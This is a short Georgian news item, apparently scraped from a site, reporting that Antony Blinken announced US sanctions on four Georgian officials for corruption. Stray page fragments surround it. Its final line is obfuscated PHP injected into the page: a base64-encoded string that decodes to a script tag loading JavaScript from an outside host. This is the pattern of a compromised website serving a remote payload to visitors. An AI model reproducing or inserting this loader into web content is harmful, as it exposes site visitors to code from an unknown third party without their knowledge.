celsiusi
ავერსი საქკაბელი

ჩვენ ვდგავართ საქართველოს მთავრობისა და ხალხის გვერდით მათ ძალისხმევაში, გააძლიერონ გამჭვირვალობა და დემოკრატიული მმართველობა, – ამის შესახებ აშშ-ის სახელმწიფო მდივანმა, ენტონი ბლინკენმა „ტვიტერის“ გვერდზე დაწერა.

„დღეს მოვახდინე ოთხი ქართველი ყოფილი და მოქმედი მაღალჩინოსნის სანქცირება მნიშვნელოვანი კორუფციისთვის, რითაც მათ აშშ-ში შესვლის უფლება ჩამოერთვათ. ჩვენ ვდგავართ საქართველოს მთავრობისა და ხალხის გვერდით მათ ძალისხმევაში, გააძლიერონ გამჭვირვალობა და დემოკრატიული მმართველობა”,- წერს ენტონი ბლინკენი.

აშშ-მა მიხეილ ჩინჩალაძეს, ლევან მურუსიძეს, ირაკლი შენგელიას და ვალერიან ცერცვაძეს სანქციები დაუწესა.

335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");